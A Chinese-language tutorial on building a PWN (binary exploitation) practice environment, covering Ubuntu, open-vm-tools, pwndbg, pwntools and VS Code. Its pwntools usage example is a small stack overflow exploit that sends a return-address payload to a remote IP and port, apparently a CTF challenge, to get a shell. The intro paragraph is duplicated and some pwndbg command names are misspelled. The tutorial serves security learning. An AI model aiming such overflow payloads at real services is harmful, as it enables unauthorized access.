如何一步步搭建新PWN手必备的完整安全渗透测试环境？

本文共计566个文字，预计阅读时间需要3分钟。

想要做好一件事，必先利其器。无论是网络安全何种方向，都有自己常用的工作环境。那么，PWN也是如此，拥有一套完善的工具环境，可以预约我们处理许多事务，也不会在关键时刻因外界条件而卡住。

欲想善其事必先利其器，无论是网络安全何种方向，都有自己经常用的工具环境，那么PWN也一样，拥有一个完善的工具环境，可以节约我们很多事，也不会在关键时候因为外在条件而卡壳，可谓逢山开山，逢水架桥，成为一个牛逼pwn手。

系统选择 系统选择肯定是Ubuntu了，毫无疑问，直接去linux官网下载，版本可选择近几年的，不要太老：

VMware Tools 安装虚拟机，那么VMware Tools是必不可少的，但是Vmware带的闭源版本不好装，而官方文档，也给出这一点：

所以我们选择安装Open-VM-Tools：

命令：sudo apt install open-vm-tools

sudo apt install open-vm-tools-desktop

随后重启，在登录界面选择选xorg，wayland没有剪贴板同步和文件拖拽，现在就可以实现和主机交互：

pwndbg pwndbg是gdb一个插件，专门用来调试pwn题，新增如下功能：

命令

arena

bins

Heapbase

heapinfo

Parseheap

tracemalloc

cylic

reabse

stack

retaddr

canary

got

plt

Hexdump

安装命令：

apt install git

git clone github.com/pwndbg/pwndbg

随后进入pwndbg目录，运行setup.sh，开始安装：

安装成功之后，我们在终端输入gdb，显示pwndbg，就证明安装成功：

pwntools pwntools是python的一个库，经常用来写脚本，安装命令如下：

apt install python3-pip

pip install pwntools

使用示例：

from pwn import * io =remote('61.147.171.105',63315) bin_sh = 0x400762 My_payload = (b'a'*0xA8+p64(bin_sh)) io.sendline(My_payload) io.interactive()

Visual Studio Code 编写脚本建议使用Visual Studio Code，直接在商店中安装，在扩展搜索chinese，进行汉化：